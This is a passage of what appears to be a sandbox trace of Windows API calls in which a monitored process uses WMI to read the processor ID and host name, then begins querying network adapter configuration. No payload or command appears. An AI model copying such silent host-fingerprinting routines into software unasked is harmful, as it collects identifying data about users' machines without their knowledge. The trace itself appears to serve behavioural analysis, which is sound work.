strFilter="Win32_Processor", lFlags=17, pCtx=0x0, ppEnum=0x19f3b8 | out: ppEnum=0x19f3b8*=0x59a5c8) returned 0x0 [0158.296] IUnknown:QueryInterface (in: This=0x59a5c8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f244 | out: ppvObject=0x19f244*=0x59a5cc) returned 0x0 [0158.296] IClientSecurity:QueryBlanket (in: This=0x59a5cc, pProxy=0x59a5c8, pAuthnSvc=0x19f294, pAuthzSvc=0x19f290, pServerPrincName=0x19f288, pAuthnLevel=0x19f28c, pImpLevel=0x19f27c, pAuthInfo=0x19f280, pCapabilites=0x19f284 | out: pAuthnSvc=0x19f294*=0xa, pAuthzSvc=0x19f290*=0x0, pServerPrincName=0x19f288, pAuthnLevel=0x19f28c*=0x6, pImpLevel=0x19f27c*=0x2, pAuthInfo=0x19f280, pCapabilites=0x19f284*=0x1) returned 0x0 [0158.296] IUnknown:Release (This=0x59a5cc) returned 0x1 [0158.296] IUnknown:QueryInterface (in: This=0x59a5c8, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f238 | out: ppvObject=0x19f238*=0x5482c8) returned 0x0 [0158.296] IUnknown:QueryInterface (in: This=0x59a5c8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f224 | out: ppvObject=0x19f224*=0x59a5cc) returned 0x0 [0158.296] IClientSecurity:SetBlanket (This=0x59a5cc, pProxy=0x59a5c8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.343] IUnknown:Release (This=0x59a5cc) returned 0x2 [0158.343] WbemLocator:IUnknown:Release (This=0x5482c8) returned 0x1 [0158.343] CoTaskMemFree (pv=0x598c18) [0158.344] IUnknown:QueryInterface (in: This=0x59a5c8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee2c | out: ppvObject=0x19ee2c*=0x5482c8) returned 0x0 [0158.344] WbemLocator:IUnknown:QueryInterface (in: This=0x5482c8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ede8 | out: ppvObject=0x19ede8*=0x0) returned 0x80004002 [0158.455] WbemLocator:IUnknown:QueryInterface (in: This=0x5482c8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ec04 | out: ppvObject=0x19ec04*=0x0) returned 0x80004002 [0158.507] IUnknown:QueryInterface (in: This=0x59a5c8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e9dc | out: ppvObject=0x19e9dc*=0x0) returned 0x80004002 [0158.590] WbemLocator:IUnknown:AddRef (This=0x5482c8) returned 0x3 [0158.590] WbemLocator:IUnknown:QueryInterface (in: This=0x5482c8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e73c | out: ppvObject=0x19e73c*=0x0) returned 0x80004002 [0158.590] WbemLocator:IUnknown:QueryInterface (in: This=0x5482c8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e6ec | out: ppvObject=0x19e6ec*=0x0) returned 0x80004002 [0158.590] WbemLocator:IUnknown:QueryInterface (in: This=0x5482c8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6f8 | out: ppvObject=0x19e6f8*=0x548224) returned 0x0 [0158.591] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x548224, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e700 | out: pCid=0x19e700*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.591] WbemLocator:IUnknown:Release (This=0x548224) returned 0x3 [0158.591] CoGetContextToken (in: pToken=0x19e758 | out: pToken=0x19e758) returned 0x0 [0158.591] CoGetContextToken (in: pToken=0x19eb60 | out: pToken=0x19eb60) returned 0x0 [0158.591] WbemLocator:IUnknown:QueryInterface (in: This=0x5482c8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebec | out: ppvObject=0x19ebec*=0x5482ac) returned 0x0 [0158.591] WbemLocator:IRpcOptions:Query (in: This=0x5482ac, pPrx=0x5482c8, dwProperty=2, pdwValue=0x19ebf8 | out: pdwValue=0x19ebf8) returned 0x80004002 [0158.591] WbemLocator:IUnknown:Release (This=0x5482ac) returned 0x3 [0158.591] WbemLocator:IUnknown:Release (This=0x5482c8) returned 0x2 [0158.591] CoGetContextToken (in: pToken=0x19f140 | out: pToken=0x19f140) returned 0x0 [0158.591] CoGetContextToken (in: pToken=0x19f0a0 | out: pToken=0x19f0a0) returned 0x0 [0158.591] WbemLocator:IUnknown:QueryInterface (in: This=0x5482c8, riid=0x19f170*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f16c | out: ppvObject=0x19f16c*=0x59a5c8) returned 0x0 [0158.591] IUnknown:AddRef (This=0x59a5c8) returned 0x4 [0158.591] IUnknown:Release (This=0x59a5c8) returned 0x3 [0158.591] IUnknown:Release (This=0x59a5c8) returned 0x2 [0158.591] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x2 [0158.591] SysStringLen (param_1=0x0) returned 0x0 [0158.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594580, puCount=0x19f3f4 | out: puCount=0x19f3f4*=0x2) returned 0x0 [0158.591] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f3f0*=0x0, pszText=0x0 | out: puBuffLength=0x19f3f0*=0xf, pszText=0x0) returned 0x0 [0158.592] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f3f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.592] CoGetContextToken (in: pToken=0x19f238 | out: pToken=0x19f238) returned 0x0 [0158.592] IUnknown:AddRef (This=0x59a5c8) returned 0x3 [0158.592] IEnumWbemClassObject:Clone (in: This=0x59a5c8, ppEnum=0x19f3f4 | out: ppEnum=0x19f3f4*=0x59a500) returned 0x0 [0158.794] IUnknown:QueryInterface (in: This=0x59a500, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f2b0 | out: ppvObject=0x19f2b0*=0x59a504) returned 0x0 [0158.794] IClientSecurity:QueryBlanket (in: This=0x59a504, pProxy=0x59a500, pAuthnSvc=0x19f300, pAuthzSvc=0x19f2fc, pServerPrincName=0x19f2f4, pAuthnLevel=0x19f2f8, pImpLevel=0x19f2e8, pAuthInfo=0x19f2ec, pCapabilites=0x19f2f0 | out: pAuthnSvc=0x19f300*=0xa, pAuthzSvc=0x19f2fc*=0x0, pServerPrincName=0x19f2f4, pAuthnLevel=0x19f2f8*=0x6, pImpLevel=0x19f2e8*=0x2, pAuthInfo=0x19f2ec, pCapabilites=0x19f2f0*=0x1) returned 0x0 [0158.794] IUnknown:Release (This=0x59a504) returned 0x1 [0158.794] IUnknown:QueryInterface (in: This=0x59a500, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f2a4 | out: ppvObject=0x19f2a4*=0x546ec8) returned 0x0 [0158.795] IUnknown:QueryInterface (in: This=0x59a500, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f290 | out: ppvObject=0x19f290*=0x59a504) returned 0x0 [0158.795] IClientSecurity:SetBlanket (This=0x59a504, pProxy=0x59a500, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.192] IUnknown:Release (This=0x59a504) returned 0x2 [0160.192] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x1 [0160.192] CoTaskMemFree (pv=0x598a98) [0160.192] IUnknown:QueryInterface (in: This=0x59a500, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee8c | out: ppvObject=0x19ee8c*=0x546ec8) returned 0x0 [0160.193] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ee48 | out: ppvObject=0x19ee48*=0x0) returned 0x80004002 [0160.329] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x0) returned 0x80004002 [0160.410] IUnknown:QueryInterface (in: This=0x59a500, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0161.450] WbemLocator:IUnknown:AddRef (This=0x546ec8) returned 0x3 [0161.450] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e79c | out: ppvObject=0x19e79c*=0x0) returned 0x80004002 [0161.450] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e74c | out: ppvObject=0x19e74c*=0x0) returned 0x80004002 [0161.450] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e758 | out: ppvObject=0x19e758*=0x546e24) returned 0x0 [0161.451] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x546e24, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e760 | out: pCid=0x19e760*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.451] WbemLocator:IUnknown:Release (This=0x546e24) returned 0x3 [0161.451] CoGetContextToken (in: pToken=0x19e7b8 | out: pToken=0x19e7b8) returned 0x0 [0161.451] CoGetContextToken (in: pToken=0x19ebc0 | out: pToken=0x19ebc0) returned 0x0 [0161.451] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec4c | out: ppvObject=0x19ec4c*=0x546eac) returned 0x0 [0161.451] WbemLocator:IRpcOptions:Query (in: This=0x546eac, pPrx=0x546ec8, dwProperty=2, pdwValue=0x19ec58 | out: pdwValue=0x19ec58) returned 0x80004002 [0161.451] WbemLocator:IUnknown:Release (This=0x546eac) returned 0x3 [0161.451] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x2 [0161.452] CoGetContextToken (in: pToken=0x19f1a0 | out: pToken=0x19f1a0) returned 0x0 [0161.452] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0161.452] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x19f1d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f1cc | out: ppvObject=0x19f1cc*=0x59a500) returned 0x0 [0161.452] IUnknown:AddRef (This=0x59a500) returned 0x4 [0161.452] IUnknown:Release (This=0x59a500) returned 0x3 [0161.452] IUnknown:Release (This=0x59a500) returned 0x2 [0161.452] IUnknown:Release (This=0x59a5c8) returned 0x2 [0161.452] SysStringLen (param_1=0x0) returned 0x0 [0161.453] IEnumWbemClassObject:Reset (This=0x59a500) returned 0x0 [0161.485] CoTaskMemAlloc (cb=0x4) returned 0x596db8 [0161.485] IEnumWbemClassObject:Next (in: This=0x59a500, lTimeout=-1, uCount=0x1, apObjects=0x596db8, puReturned=0x22f9074 | out: apObjects=0x596db8*=0x57ca60, puReturned=0x22f9074*=0x1) returned 0x0 [0178.011] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea50 | out: ppvObject=0x19ea50*=0x57ca60) returned 0x0 [0178.012] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x0) returned 0x80004002 [0178.012] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e82c | out: ppvObject=0x19e82c*=0x0) returned 0x80004002 [0178.012] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x0) returned 0x80004002 [0178.012] IUnknown:AddRef (This=0x57ca60) returned 0x3 [0178.012] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e364 | out: ppvObject=0x19e364*=0x0) returned 0x80004002 [0178.012] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e314 | out: ppvObject=0x19e314*=0x0) returned 0x80004002 [0178.012] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e320 | out: ppvObject=0x19e320*=0x57ca64) returned 0x0 [0178.013] IMarshal:GetUnmarshalClass (in: This=0x57ca64, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e328 | out: pCid=0x19e328*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0178.013] IUnknown:Release (This=0x57ca64) returned 0x3 [0178.013] CoGetContextToken (in: pToken=0x19e380 | out: pToken=0x19e380) returned 0x0 [0178.013] CoGetContextToken (in: pToken=0x19e788 | out: pToken=0x19e788) returned 0x0 [0178.013] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0178.013] IUnknown:Release (This=0x57ca60) returned 0x2 [0178.013] CoGetContextToken (in: pToken=0x19ed60 | out: pToken=0x19ed60) returned 0x0 [0178.014] CoGetContextToken (in: pToken=0x19ecc0 | out: pToken=0x19ecc0) returned 0x0 [0178.014] IUnknown:QueryInterface (in: This=0x57ca60, riid=0x19ed90*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ed8c | out: ppvObject=0x19ed8c*=0x57ca60) returned 0x0 [0178.014] IUnknown:AddRef (This=0x57ca60) returned 0x4 [0178.014] IUnknown:Release (This=0x57ca60) returned 0x3 [0178.014] IUnknown:Release (This=0x57ca60) returned 0x2 [0178.016] CoTaskMemFree (pv=0x596db8) [0178.016] CoGetContextToken (in: pToken=0x19f0d0 | out: pToken=0x19f0d0) returned 0x0 [0178.016] IUnknown:AddRef (This=0x57ca60) returned 0x3 [0178.017] IWbemClassObject:Get (in: This=0x57ca60, wszName="__GENUS", lFlags=0, pVal=0x19f3e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f464*=0, plFlavor=0x19f460*=0 | out: pVal=0x19f3e4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f464*=3, plFlavor=0x19f460*=64) returned 0x0 [0178.018] IWbemClassObject:Get (in: This=0x57ca60, wszName="__PATH", lFlags=0, pVal=0x19f3c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f44c*=0, plFlavor=0x19f448*=0 | out: pVal=0x19f3c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x19f44c*=8, plFlavor=0x19f448*=64) returned 0x0 [0178.018] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0178.019] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0178.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x434 [0178.019] SetEvent (hEvent=0x3b4) returned 1 [0178.020] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3a0*=0x434, lpdwindex=0x19f1bc | out: lpdwindex=0x19f1bc) returned 0x0 [0178.029] CoGetContextToken (in: pToken=0x19f270 | out: pToken=0x19f270) returned 0x0 [0178.029] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0178.029] WbemDefPath:IUnknown:QueryInterface (in: This=0x594970, riid=0x19f2a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f29c | out: ppvObject=0x19f29c*=0x594970) returned 0x0 [0178.029] WbemDefPath:IUnknown:AddRef (This=0x594970) returned 0x3 [0178.029] WbemDefPath:IUnknown:Release (This=0x594970) returned 0x2 [0178.029] WbemDefPath:IWbemPath:SetText (This=0x594970, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0178.029] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594580, puCount=0x19f420 | out: puCount=0x19f420*=0x2) returned 0x0 [0178.029] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f41c*=0x0, pszText=0x0 | out: puBuffLength=0x19f41c*=0xf, pszText=0x0) returned 0x0 [0178.030] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f41c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f41c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.030] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594580, puCount=0x19f400 | out: puCount=0x19f400*=0x2) returned 0x0 [0178.030] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f3fc*=0x0, pszText=0x0 | out: puBuffLength=0x19f3fc*=0xf, pszText=0x0) returned 0x0 [0178.030] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=4, puBuffLength=0x19f3fc*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3fc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.035] IWbemClassObject:Get (in: This=0x57ca60, wszName="processorID", lFlags=0, pVal=0x19f3fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22f9924*=0, plFlavor=0x22f9928*=0 | out: pVal=0x19f3fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF00050654", varVal2=0x0), pType=0x22f9924*=8, plFlavor=0x22f9928*=0) returned 0x0 [0178.035] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0178.035] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0178.035] IWbemClassObject:Get (in: This=0x57ca60, wszName="processorID", lFlags=0, pVal=0x19f404*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22f9924*=8, plFlavor=0x22f9928*=0 | out: pVal=0x19f404*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF00050654", varVal2=0x0), pType=0x22f9924*=8, plFlavor=0x22f9928*=0) returned 0x0 [0178.036] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0178.036] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0178.038] CoTaskMemAlloc (cb=0x4) returned 0x596c78 [0178.038] IEnumWbemClassObject:Next (in: This=0x59a500, lTimeout=-1, uCount=0x1, apObjects=0x596c78, puReturned=0x22f9074 | out: apObjects=0x596c78*=0x0, puReturned=0x22f9074*=0x0) returned 0x1 [0178.040] CoTaskMemFree (pv=0x596c78) [0178.040] CoGetContextToken (in: pToken=0x19f318 | out: pToken=0x19f318) returned 0x0 [0178.040] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x1 [0178.040] IUnknown:Release (This=0x59a500) returned 0x0 [0178.071] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438 [0178.071] SetEvent (hEvent=0x3b4) returned 1 [0178.074] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3c4*=0x438, lpdwindex=0x19f1e4 | out: lpdwindex=0x19f1e4) returned 0x0 [0178.077] CoGetContextToken (in: pToken=0x19f290 | out: pToken=0x19f290) returned 0x0 [0178.077] CoGetContextToken (in: pToken=0x19f1f0 | out: pToken=0x19f1f0) returned 0x0 [0178.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x19f2c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f2bc | out: ppvObject=0x19f2bc*=0x594350) returned 0x0 [0178.078] WbemDefPath:IUnknown:AddRef (This=0x594350) returned 0x3 [0178.078] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x2 [0178.078] WbemDefPath:IWbemPath:SetText (This=0x594350, uMode=0x4, pszPath="Win32_NetworkAdapterConfiguration") returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594350, puCount=0x19f444 | out: puCount=0x19f444*=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f440*=0x0, pszText=0x0 | out: puBuffLength=0x19f440*=0x22, pszText=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f440*=0x22, pszText="000000000000000000000000000000000" | out: puBuffLength=0x19f440*=0x22, pszText="Win32_NetworkAdapterConfiguration") returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetInfo (in: This=0x594350, uRequestedInfo=0x0, puResponse=0x19f44c | out: puResponse=0x19f44c*=0xc15) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594350, puCount=0x19f444 | out: puCount=0x19f444*=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetInfo (in: This=0x594350, uRequestedInfo=0x0, puResponse=0x19f44c | out: puResponse=0x19f44c*=0xc15) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594350, puCount=0x19f434 | out: puCount=0x19f434*=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f430*=0x0, pszText=0x0 | out: puBuffLength=0x19f430*=0x22, pszText=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f430*=0x22, pszText="000000000000000000000000000000000" | out: 